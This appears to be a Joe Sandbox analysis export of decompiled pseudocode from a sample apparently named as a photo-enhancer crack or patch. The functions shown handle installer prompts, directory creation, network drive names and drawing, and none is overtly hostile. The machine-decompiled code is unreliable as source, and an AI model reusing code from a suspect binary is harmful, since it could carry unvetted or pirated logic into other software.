				_t183 =  *0x49f3e4; // 0x2252a54
				E0046B3FC( *0x49f0ac, _t165, _t183);
				 *0x49f3d5 =  *((intOrPtr*)( *((intOrPtr*)( *0x49f0ac + 0x2f0)) + 0x101));
				_t217 =  *0x49f120;
				if( *0x49f120 != 0) {
					_t159 =  *0x49f120; // 0x0
					E0047C050(_t159, 0x49f0ac, _t207, _t208, _t217);
				}
				_t86 =  *0x49e62c; // 0x2252410
				E0042466C(_t86);
				 *((intOrPtr*)( *_v8 + 0x50))();
				_t218 =  *0x49f443 - 1;
				if( *0x49f443 == 1) {
					_t154 =  *0x49e62c; // 0x2252410
					SetActiveWindow( *(_t154 + 0x20));
					E00423294( *0x49f0ac);
				}
				 *((intOrPtr*)( *((intOrPtr*)( *0x49f0ac)) + 0x50))();
				E00484874(_v8, 0, 1);
				E00477D0C( &_v10, 0x49f0ac, 0, _t207, _t208, _t218, _t221);
				if(_v10 != 0) {
					E00414F10( *((intOrPtr*)( *0x49f0ac + 0x1b8)), 0);
					E00484FE0(0x49f0ac, 0, _t207, _t208, _t211);
					_pop(_t167);
					__eflags =  *0x49f3fa;
					if( *0x49f3fa == 0) {
						L15:
						E00484874(_v8, 1, 2);
						__eflags =  *0x49f31c & 0x00000020;
						if(( *0x49f31c & 0x00000020) != 0) {
							SHChangeNotify(0x8000000, 0, 0, 0);
						}
						__eflags =  *0x49f31f & 0x00000040;
						if(( *0x49f31f & 0x00000040) != 0) {
							E0045685C(1);
						}
						__eflags =  *0x49f443;
						if( *0x49f443 != 0) {
							E0042328C();
						}
						_v28 =  *0x0049CB14;
						_v24 = 0xb;
						E004587AC("Need to restart Windows? %s", 0x49f0ac, 0,  &_v28, _t207, _t208);
						__eflags =  *0x49f44c;
						if( *0x49f44c == 0) {
							L24:
							__eflags =  *0x49f48c;
							if( *0x49f48c == 0) {
								E00467C8C(0x57,  &_v16);
							} else {
								E00467C8C(0x56,  &_v16);
							}
							E00403494( &_v32, _v16);
							E0040357C( &_v32, 0x4857d4);
							_t193 =  *0x49ecc8; // 0x230b7b8
							E0040357C( &_v32, _t193);
							E0046A6F8( *0x49f0ac, 0x49f0ac, 0, _v32, _t207, _t208, __eflags);
							__eflags =  *0x49f44c;
							if( *0x49f44c == 0) {
								_t174 =  *0x49f3e4; // 0x2252a54
								_t198 =  *0x49f3dc; // 0x22529fc
								E0046A7C0( *0x49f0ac, 0x49f0ac, _t174, _t198, _t207, _t208);
								_t133 =  *((intOrPtr*)( *( *( *((intOrPtr*)( *0x49f0ac + 0x2d4)) + 0xfc)) + 0x10))();
								_t133 = _t133 > 0;
								E00414ED4( *((intOrPtr*)( *0x49f0ac + 0x2d4)), _t174,  *( *( *((intOrPtr*)( *0x49f0ac + 0x2d4)) + 0xfc)) & 0xffffff00 | _t133 > 0x00000000, _t207);
							}
							goto L29;
						} else {
							__eflags =  *0x49f127;
							if(__eflags != 0) {
								goto L24;
							}
							E00467C8C(0x58,  &_v32);
							E0046A6F8( *0x49f0ac, 0x49f0ac, 0, _v32, _t207, _t208, __eflags);
							E00414ED4( *((intOrPtr*)( *0x49f0ac + 0x25c)), 0, 1, _t207);
							E00414ED4( *((intOrPtr*)( *0x49f0ac + 0x260)), 0, 1, _t207);
							L29:
							__eflags =  *0x49f443;
							if( *0x49f443 == 0) {
								_t125 =  *0x49e62c; // 0x2252410
								E0042466C(_t125);
								 *((intOrPtr*)( *_v8 + 0x50))();
							}
							_v9 = 1;
							_pop(_t195);
							 *[fs:eax] = _t195;
							goto L32;
						}
					}
					__eflags =  *0x49f12c;
					if( *0x49f12c != 0) {
						L14:
						E00485278(0x49f0ac, _t167, _t207, _t208);
						goto L15;
					}
					__eflags =  *0x49f320 & 0x00000020;
					if(( *0x49f320 & 0x00000020) == 0) {
						goto L15;
					}
					__eflags =  *0x49f12d;
					if( *0x49f12d != 0) {
						goto L15;
					}
					goto L14;
				} else {
					E00484004();
					_pop(_t206);
					 *[fs:eax] = _t206;
					L32:
					_pop(_t196);
					 *[fs:eax] = _t196;
					_push(0x48579c);
					E00403400( &_v32);
					E00403400( &_v20);
					return E00403400( &_v16);
				}
			}

0x00485444
0x00485444
0x00485444
0x00485444
0x00485445
0x00485447
0x0048544a
0x0048544b
0x0048544c
0x0048544f
0x00485452
0x00485455
0x00485458
0x00485462
0x00485463
0x00485468
0x0048546b
0x0048546e
0x00485474
0x00485475
0x0048547a
0x0048547d
0x00485482
0x00485487
0x00485489
0x0048548b
0x0048548b
0x0048549b
0x004854a8
0x004854af
0x004854b4
0x004854b6
0x004854b8
0x004854b8
0x004854c8
0x004854d5
0x004854e7
0x004854f3
0x004854f8
0x004854fe
0x00485506
0x0048550b
0x00485511
0x00485519
0x0048552c
0x00485531
0x00485538
0x0048553a
0x0048553f
0x0048553f
0x00485544
0x00485549
0x00485553
0x00485556
0x0048555d
0x0048555f
0x00485568
0x0048556f
0x0048556f
0x00485578
0x00485582
0x0048558a
0x00485593
0x004855b1
0x004855b7
0x004855bc
0x004855bd
0x004855c4
0x004855e6
0x004855ed
0x004855f2
0x004855f9
0x00485606
0x00485606
0x0048560b
0x00485612
0x00485614
0x00485614
0x00485619
0x00485620
0x00485624
0x00485624
0x00485637
0x0048563a
0x00485648
0x0048564d
0x00485654
0x00485696
0x00485696
0x0048569d
0x004856b0
0x0048569f
0x004856a4
0x004856a4
0x004856bb
0x004856c8
0x004856d0
0x004856d6
0x004856e0
0x004856e5
0x004856ec
0x004856ee
0x004856f4
0x004856fc
0x00485711
0x00485716
0x0048571b
0x0048571b
0x00000000
0x00485656
0x00485656
0x0048565d
0x00000000
0x00000000
0x00485664
0x0048566e
0x0048567d
0x0048568c
0x00485720
0x00485720
0x00485727
0x00485729
0x0048572e
0x00485738
0x00485738
0x0048573b
0x00485741
0x00485744
0x00000000
0x00485744
0x00485654
0x004855c6
0x004855cd
0x004855e1
0x004855e1
0x00000000
0x004855e1
0x004855cf
0x004855d6
0x00000000
0x00000000
0x004855d8
0x004855df
0x00000000
0x00000000
0x00000000
0x00485595
0x00485595
0x0048559c
0x0048559f
0x0048576f
0x00485771
0x00485774
0x00485777
0x0048577f
0x00485787
0x00485794
0x00485794

APIs

SetActiveWindow.USER32(?,?,00000000,00485795), ref: 00485568
SHChangeNotify.SHELL32(08000000,00000000,00000000,00000000), ref: 00485606

Strings

, xrefs: 004856C3
Need to restart Windows? %s, xrefs: 00485643

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: ActiveChangeNotifyWindow
String ID: $Need to restart Windows? %s
API String ID: 1160245247-4200181552
Opcode ID: a95cbf927e22f80de55b02d4689da4a175a84f58c248fd1ee268b9745b637bd1
Instruction ID: 8ac728fbb8e3d27f98a22662cdea6886523d2868be6ee68a7c392ecda210aa03
Opcode Fuzzy Hash: a95cbf927e22f80de55b02d4689da4a175a84f58c248fd1ee268b9745b637bd1
Instruction Fuzzy Hash: 1B91A034A006449FDB10EB69D885B9E77E1AF55308F5484BBE800DB366D73CA809CB5E

Uniqueness

Uniqueness Score: -1.00%

Function 00471340 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 161
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E00471340(signed int __eax, void* __ebx, signed int __ecx, char __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				char _v8;
				signed int _v9;
				char _v10;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				signed int _t103;
				intOrPtr* _t108;
				signed int _t133;
				signed int _t138;
				intOrPtr _t153;
				void* _t158;
				void* _t174;
				void* _t176;

				_t176 = __eflags;
				_t169 = __edi;
				_t135 = __ecx;
				_push(__esi);
				_push(__edi);
				_v16 = 0;
				_v20 = 0;
				_v44 = 0;
				_v48 = 0;
				_v9 = __ecx;
				_v8 = __edx;
				_t133 = __eax;
				E00403728(_v8);
				_push(_t174);
				_push(0x47153d);
				_push( *[fs:eax]);
				 *[fs:eax] = _t174 + 0xffffffd0;
				_v10 = 0;
				E0042CC94(_v8,  &_v20);
				E0042D050(_v20, _t135,  &_v16, _t176);
				E00403494( &_v8, _v16);
				E0042CDBC(_v8, _t135,  &_v16);
				_t177 = _v16;
				if(_v16 == 0) {
					L16:
					_pop(_t153);
					 *[fs:eax] = _t153;
					_push(0x471544);
					E00403420( &_v48, 2);
					E00403420( &_v20, 2);
					return E00403400( &_v8);
				}
				if(E00453158(_t133, _v8, _t177) == 0) {
					_push(_a4);
					E0042CD34(_v8, _t135,  &_v16);
					_push(_v16);
					_t138 =  *0x471550; // 0x2
					_pop(_t158);
					E00471340(_t133, _t133,  !_t138 & _v9, _t158, __edi, __esi, __eflags);
					_v28 = _v8;
					_v24 = 0xb;
					_t142 = 0;
					E004587AC("Creating directory: %s", _t133, 0,  &_v28, __edi, __esi);
					_t103 = E00452F48(_t133, _v8, __eflags);
					__eflags = _t103;
					if(_t103 == 0) {
						_t133 = GetLastError();
						E00451C30(0x36,  &_v20, _v8);
						_v40 = _v20;
						E004071F8(_t133,  &_v44);
						_v36 = _v44;
						E0042ED58(_t133,  &_v48);
						_v32 = _v48;
						E00451C00(0x68, 2,  &_v40,  &_v16);
						_t142 = _v16;
						E0040909C(_v16, 1);
						E0040311C();
					}
					_v10 = 1;
					__eflags = _v9 & 0x00000008;
					if((_v9 & 0x00000008) != 0) {
						SHChangeNotify(8, 1, E00403738(_v8), 0);
						E0042CD34(_v8, _t142,  &_v16);
						SHChangeNotify(0x1000, 0x1001, E00403738(_v16), 0);
					}
					L8:
					if((_v9 & 0x00000004) == 0) {
						__eflags = _v9 & 0x00000001;
						if((_v9 & 0x00000001) == 0) {
							_t171 = 2;
							__eflags = _t133;
							if(_t133 != 0) {
								_t171 = 0x22;
								__eflags = 2;
							}
							__eflags = _v9 & 0x00000008;
							if((_v9 & 0x00000008) != 0) {
								__eflags = _t171;
							}
							_v52 = _v8;
							E0045AA94( *((intOrPtr*)(_a4 - 4)), _t133,  &_v52, 0x81, _t169, _t171, _t171, 0);
						}
					} else {
						_t108 =  *0x49f470; // 0x2252c18
						 *((intOrPtr*)( *_t108 + 0x30))();
					}
					goto L16;
				}
				if((_v9 & 0x00000002) == 0) {
					goto L16;
				} else {
					goto L8;
				}
			}

0x00471340
0x00471340
0x00471340
0x00471347
0x00471348
0x0047134b
0x0047134e
0x00471351
0x00471354
0x00471357
0x0047135a
0x0047135d
0x00471362
0x00471369
0x0047136a
0x0047136f
0x00471372
0x00471375
0x0047137f
0x0047138a
0x00471395
0x004713a0
0x004713a5
0x004713a9
0x0047150d
0x0047150f
0x00471512
0x00471515
0x00471522
0x0047152f
0x0047153c
0x0047153c
0x004713bb
0x004713cf
0x004713d6
0x004713de
0x004713df
0x004713ec
0x004713ed
0x004713f6
0x004713f9
0x00471400
0x00471407
0x00471411
0x00471416
0x00471418
0x0047141f
0x0047142d
0x00471435
0x0047143d
0x00471445
0x0047144d
0x00471455
0x00471462
0x00471467
0x00471471
0x00471476
0x00471476
0x0047147b
0x0047147f
0x00471483
0x00471494
0x004714a1
0x004714b9
0x004714b9
0x004714be
0x004714c2
0x004714d7
0x004714db
0x004714dd
0x004714e2
0x004714e4
0x004714e6
0x004714e6
0x004714e6
0x004714e9
0x004714ed
0x004714ef
0x004714ef
0x004714f8
0x00471508
0x00471508
0x004714c4
0x004714cb
0x004714d2
0x004714d2
0x00000000
0x004714c2
0x004713c1
0x00000000
0x004713c7
0x00000000
0x004713c7

APIs

Part of subcall function 0042CC94: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042CCB8

GetLastError.KERNEL32(00000000,0047153D,?,?,0049F1E4,00000000), ref: 0047141A
SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 00471494
SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 004714B9

Strings

Creating directory: %s, xrefs: 00471402

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: ChangeNotify$ErrorFullLastNamePath
String ID: Creating directory: %s
API String ID: 2451617938-483064649
Opcode ID: f3f5c76d6a811d2342dfff82ede6b91c6ded70d56010fc8a7de985c9a00577ad
Instruction ID: 20bf2e2c57de6391f44c88e9dad00ec8a22121e450acada444c040a0f05f54d0
Opcode Fuzzy Hash: f3f5c76d6a811d2342dfff82ede6b91c6ded70d56010fc8a7de985c9a00577ad
Instruction Fuzzy Hash: 94514634E00248ABDB01DFA9C982BDEB7F5AF48304F50847AE815B7392D7789E04CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00407434 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 156
shareCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00407434(intOrPtr* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				intOrPtr _v12;
				int _v16;
				int _v20;
				int _v24;
				char _v25;
				void* _v32;
				void* _v36;
				void _v1060;
				char _v1064;
				char _v1068;
				int _t76;
				void* _t113;
				intOrPtr _t116;
				signed int _t128;
				void* _t131;
				void* _t132;
				void* _t134;
				void* _t135;
				intOrPtr _t136;

				_t134 = _t135;
				_t136 = _t135 + 0xfffffbd8;
				_v1064 = 0;
				_v1068 = 0;
				_v12 = __edx;
				_v8 = __eax;
				_push(_t134);
				_push(0x407678);
				_push( *[fs:eax]);
				 *[fs:eax] = _t136;
				E00403494(_v12, _v8);
				if( *0x49c0dc == 1) {
					_v25 = E004027B4( *_v8);
					if(_v25 >= 0x41 && _v25 <= 0x5a && E00403574(_v8) >= 3 &&  *((char*)(_v8 + 1)) == 0x3a &&  *((char*)(_v8 + 2)) == 0x5c && WNetOpenEnumA(1, 1, 0, 0,  &_v32) == 0) {
						 *[fs:edx] = _t136;
						_v20 = 0x640;
						_v36 = E00402648(_v20,  *[fs:edx], 0x407653, _t134);
						_push(_t134);
						_push(0x407635);
						_push( *[fs:edx]);
						 *[fs:edx] = _t136;
						while(1) {
							L10:
							_v16 = 0xffffffff;
							_v24 = _v20;
							_t76 = WNetEnumResourceA(_v32,  &_v16, _v36,  &_v24);
							if(_t76 == 0xea) {
								break;
							}
							if(_t76 == 0) {
								_t131 = _v16 - 1;
								if(_t131 < 0) {
									continue;
								} else {
									_t132 = _t131 + 1;
									_t128 = 0;
									while(1) {
										_t107 = _v36 + (_t128 << 2) * 8;
										if( *((intOrPtr*)(_v36 + (_t128 << 2) * 8 + 0x10)) != 0 && E004027B4( *((intOrPtr*)( *((intOrPtr*)(_t107 + 0x10))))) == _v25) {
											break;
										}
										_t128 = _t128 + 1;
										_t132 = _t132 - 1;
										if(_t132 != 0) {
											continue;
										} else {
											goto L10;
										}
										goto L21;
									}
									E00403778(_v8, E00403574(_v8) - 2, 3,  &_v1064);
									_push(_v1064);
									E0040352C( &_v1068,  *((intOrPtr*)(_t107 + 0x14)));
									_pop(_t113);
									E004035C0(_v12, _t113, _v1068);
									E004031BC();
									E004031BC();
								}
							} else {
								E004031BC();
								E004031BC();
							}
							goto L21;
						}
						_v20 = _v24;
						E00402678( &_v36, _v20);
						goto L10;
					}
				} else {
					_v24 = 0x400;
					if(WNetGetUniversalNameA(E00403738(_v8), 1,  &_v1060,  &_v24) == 0) {
						E0040352C(_v12, _v1060);
					}
				}
				L21:
				_pop(_t116);
				 *[fs:eax] = _t116;
				_push(E0040767F);
				return E00403420( &_v1068, 2);
			}

0x00407435
0x00407437
0x00407442
0x00407448
0x0040744e
0x00407451
0x00407456
0x00407457
0x0040745c
0x0040745f
0x00407468
0x00407474
0x004074bf
0x004074c6
0x00407525
0x00407528
0x00407537
0x0040753c
0x0040753d
0x00407542
0x00407545
0x00407548
0x00407548
0x00407548
0x00407552
0x00407565
0x0040756f
0x00000000
0x00000000
0x00407586
0x0040759a
0x0040759d
0x00000000
0x0040759f
0x0040759f
0x004075a0
0x004075a2
0x004075aa
0x004075b1
0x00000000
0x00000000
0x00407613
0x00407614
0x00407615
0x00000000
0x00407617
0x00000000
0x00407617
0x00000000
0x00407615
0x004075de
0x004075e9
0x004075f3
0x00407601
0x00407602
0x00407607
0x0040760c
0x0040760c
0x00407588
0x00407588
0x0040758d
0x0040758d
0x00000000
0x00407586
0x00407574
0x0040757d
0x00000000
0x0040757d
0x00407476
0x00407476
0x0040749a
0x004074ab
0x004074ab
0x0040749a
0x0040765a
0x0040765c
0x0040765f
0x00407662
0x00407677

APIs

WNetGetUniversalNameA.MPR(00000000,00000001,?,00000400), ref: 00407493
WNetOpenEnumA.MPR(00000001,00000001,00000000,00000000,?), ref: 0040750D
WNetEnumResourceA.MPR(?,FFFFFFFF,?,?), ref: 00407565

Strings

Z, xrefs: 004074CC

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: Enum$NameOpenResourceUniversal
String ID: Z
API String ID: 3604996873-1505515367
Opcode ID: 59fc97221ce8e2239389e9c8dfc74c2c781be37928cd4af1c274feeaca823a59
Instruction ID: 40f8d8e8b2f406d6a8a22564fe957c27a4ea1e6c79599dfe788430968c9fdea8
Opcode Fuzzy Hash: 59fc97221ce8e2239389e9c8dfc74c2c781be37928cd4af1c274feeaca823a59
Instruction Fuzzy Hash: DD51A270E04608AFDB11EF99CC41A9EBBF9EB09314F1045BAE400B72D1D778AE418F5A

Uniqueness

Uniqueness Score: -1.00%

Function 004613A0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 132
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E004613A0(intOrPtr __eax, intOrPtr __ecx, intOrPtr* __edx, void* __fp0, char _a4, intOrPtr _a8, signed int _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v13;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* _v32;
				intOrPtr _v40;
				intOrPtr _v48;
				intOrPtr _v76;
				short _v78;
				short _v80;
				signed int _v84;
				signed int _v88;
				struct tagBITMAPINFO _v92;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HBITMAP__* _t92;
				signed int _t110;
				intOrPtr _t125;
				intOrPtr* _t133;
				void* _t136;
				void* _t138;
				intOrPtr _t139;
				void* _t148;

				_t148 = __fp0;
				_t136 = _t138;
				_t139 = _t138 + 0xffffffa8;
				_v12 = __ecx;
				_t133 = __edx;
				_v8 = __eax;
				_v13 = 0;
				if(_a12 <= 0 || _a8 <= 0 || GetDeviceCaps(E0041B524(_v8), 0xc) <= 8) {
					L11:
					return _v13;
				} else {
					_t110 =  *((intOrPtr*)( *_t133 + 0x20))();
					_v24 =  *((intOrPtr*)( *_t133 + 0x1c))();
					if(_t110 <= 0 || _v24 <= 0) {
						goto L11;
					} else {
						E00402934( &_v92, 0x2c);
						_v92.bmiHeader = 0x28;
						_v88 = _t110;
						_v84 = _v24;
						_v80 = 1;
						_v76 = 0;
						if(_a4 == 0) {
							_v78 = 0x18;
							_v28 = 3;
							_v48 = E004611DC;
						} else {
							_v78 = 0x20;
							_v28 = 4;
							_v48 = E004612A8;
						}
						_v20 = _a12 * _v28 + 0x00000003 & 0xfffffffc;
						_t131 = _t110 * _v28 + 0x00000003 & 0xfffffffc;
						_v40 = E00402648(_v24 * _v20);
						 *[fs:eax] = _t139;
						_v32 = E00402648((_t110 * _v28 + 0x00000003 & 0xfffffffc) * _v24,  *[fs:eax], 0x4615e1, _t136);
						 *[fs:eax] = _t139;
						_t92 =  *((intOrPtr*)( *_t133 + 0x4c))( *[fs:eax], 0x461524, _t136);
						if(GetDIBits(E0041B524(_v8), _t92, 0, _v24, _v32,  &_v92, 0) != 0) {
							E00460F1C(_a12, _t110, _v32, _t110, _t131, _t133, __eflags, _t148, _v48, _v20, _t131, _v24, _v28, _v40);
							__eflags = 0;
							_pop(_t125);
							 *[fs:eax] = _t125;
							_push(0x46152b);
							return E00402660(_v32);
						} else {
							E004031BC();
							E004031BC();
							goto L11;
						}
					}
				}
			}

0x004613a0
0x004613a1
0x004613a3
0x004613a9
0x004613ac
0x004613ae
0x004613b1
0x004613b9
0x004615e8
0x004615f1
0x004613e2
0x004613e9
0x004613f2
0x004613f7
0x00000000
0x00461407
0x00461411
0x00461416
0x0046141d
0x00461423
0x00461426
0x0046142e
0x00461435
0x0046144d
0x00461453
0x0046145a
0x00461437
0x00461437
0x0046143d
0x00461444
0x00461444
0x0046146d
0x00461479
0x00461487
0x00461495
0x004614a2
0x004614b0
0x004614c7
0x004614db
0x00461509
0x0046150e
0x00461510
0x00461513
0x00461516
0x00461523
0x004614dd
0x004614dd
0x004614e2
0x00000000
0x004614e2
0x004614db
0x004613f7

APIs

GetDeviceCaps.GDI32(00000000,0000000C), ref: 004613D4
GetDIBits.GDI32(00000000,00000000,?,00000000,00000000,004615E1), ref: 004614D4

Strings

(, xrefs: 00461416
, xrefs: 00461437

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: BitsCapsDevice
String ID: $(
API String ID: 1216508973-55695022
Opcode ID: 5957ec3d1a6f1ea59fd2c6b39eb5ebbf337cafbddb9fa20bd40169d8452b2992
Instruction ID: 5dc47b70b294587cc13581978d3ce92ec5f010f9ab1f52b5f87cd7b8da97004a
Opcode Fuzzy Hash: 5957ec3d1a6f1ea59fd2c6b39eb5ebbf337cafbddb9fa20bd40169d8452b2992
Instruction Fuzzy Hash: 67413E71E00209AFDB00DFA9C885AAEFBF8FF49304F14406AE515F72A0D7799944CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 0044D62C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 126
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E0044D62C(void* __eax, void* __ebx, signed char* __ecx, intOrPtr __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				signed char* _v12;
				signed int _v16;
				char _v20;
				struct tagRECT _v36;
				struct tagRECT _v52;
				signed int _t70;
				int _t76;
				CHAR* _t78;
				signed char _t82;
				int _t94;
				CHAR* _t96;
				void* _t105;
				intOrPtr _t119;
				intOrPtr _t122;
				int _t124;
				void* _t127;
				void* _t130;

				_v20 = 0;
				_v12 = __ecx;
				_v8 = __edx;
				_t105 = __eax;
				_push(_t130);
				_push(0x44d7b3);
				_push( *[fs:eax]);
				 *[fs:eax] = _t130 + 0xffffffd0;
				_t127 = E0044E4E8(__eax);
				E0040AED8(0, E00414B4C(_t105), 0,  &_v36, 0);
				_t70 =  *((intOrPtr*)(_t127 + 9));
				if( *((char*)(_t127 + 8)) != 0) {
					_t70 = 1;
				}
				_t122 =  *((intOrPtr*)(_t105 + 0x158));
				_v36.left = _v36.left + (_t122 + _t122 +  *((intOrPtr*)(_t105 + 0x148))) * _t70;
				_v36.left = _v36.left + 1;
				if( *((intOrPtr*)(_t127 + 0x14)) == 0) {
					_v36.right = _v36.right - _t122;
				} else {
					_v16 = 0xd20;
					if( *((char*)(_t105 + 0x184)) != 0) {
						_v16 = _v16 | 0x00020002;
					}
					SetRectEmpty( &_v52);
					_t94 = E00403574( *((intOrPtr*)(_t127 + 0x14)));
					_t96 = E00403738( *((intOrPtr*)(_t127 + 0x14)));
					DrawTextA(E0041B524( *((intOrPtr*)(_t105 + 0x104))), _t96, _t94,  &_v52, _v16);
					_v36.right = _v36.right -  *((intOrPtr*)(_t105 + 0x158)) +  *((intOrPtr*)(_t105 + 0x158)) + _v52.right;
				}
				if( *((char*)(_t105 + 0x16c)) == 0) {
					_v36.left = _v36.left + 1;
				}
				_v16 = 0x40510;
				if( *((char*)(_t105 + 0x16c)) == 0 ||  *((char*)(_t127 + 8)) == 0) {
					_v16 = _v16 | 0x00000800;
				}
				if( *((char*)(_t105 + 0x184)) != 0) {
					_v16 = _v16 | 0x00020002;
				}
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t105 + 0xfc)))) + 0xc))();
				_t76 = E00403574(_v20);
				_t78 = E00403738(_v20);
				_t124 = DrawTextA(E0041B524( *((intOrPtr*)(_t105 + 0x104))), _t78, _t76,  &_v36, _v16);
				 *((intOrPtr*)(_t127 + 0x38)) = _t124;
				_t82 =  *(_t105 + 0x154);
				if(_t124 >= _t82) {
					 *_v12 = _t124 + 4;
				} else {
					 *_v12 = _t82;
				}
				if(( *_v12 & 0x00000001) != 0) {
					 *_v12 =  *_v12 + 1;
				}
				_pop(_t119);
				 *[fs:eax] = _t119;
				_push(0x44d7ba);
				return E00403400( &_v20);
			}

0x0044d637
0x0044d63a
0x0044d63d
0x0044d640
0x0044d644
0x0044d645
0x0044d64a
0x0044d64d
0x0044d65a
0x0044d66f
0x0044d676
0x0044d67d
0x0044d67f
0x0044d67f
0x0044d680
0x0044d693
0x0044d696
0x0044d69d
0x0044d6fa
0x0044d69f
0x0044d69f
0x0044d6ad
0x0044d6af
0x0044d6af
0x0044d6ba
0x0044d6ca
0x0044d6d3
0x0044d6e5
0x0044d6f5
0x0044d6f5
0x0044d704
0x0044d706
0x0044d706
0x0044d709
0x0044d717
0x0044d71f
0x0044d71f
0x0044d72d
0x0044d72f
0x0044d72f
0x0044d744
0x0044d752
0x0044d75b
0x0044d772
0x0044d774
0x0044d777
0x0044d77f
0x0044d78e
0x0044d781
0x0044d784
0x0044d784
0x0044d796
0x0044d79b
0x0044d79b
0x0044d79f
0x0044d7a2
0x0044d7a5
0x0044d7b2

APIs

SetRectEmpty.USER32(?), ref: 0044D6BA
DrawTextA.USER32(00000000,00000000,00000000,?,00000D20), ref: 0044D6E5
DrawTextA.USER32(00000000,00000000,00000000,00000000,00000800), ref: 0044D76D

Strings

, xrefs: 0044D69F

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: DrawText$EmptyRect
String ID:
API String ID: 182455014-2867612384
Opcode ID: e6e59adc673dea5e3a01a58b7e7b770fcdf0972a29114f76cbe18b4b20e21186
Instruction ID: 12a4b21e602b9f7a78cd53eafda620a7b7433ebb18c5ccfef023c502be569e40
Opcode Fuzzy Hash: e6e59adc673dea5e3a01a58b7e7b770fcdf0972a29114f76cbe18b4b20e21186
Instruction Fuzzy Hash: B6515171E00244AFDB11DFA5C885BDEBBF9EF49308F05847AE805EB252D7789944CB64

Uniqueness

Uniqueness Score: -1.00%

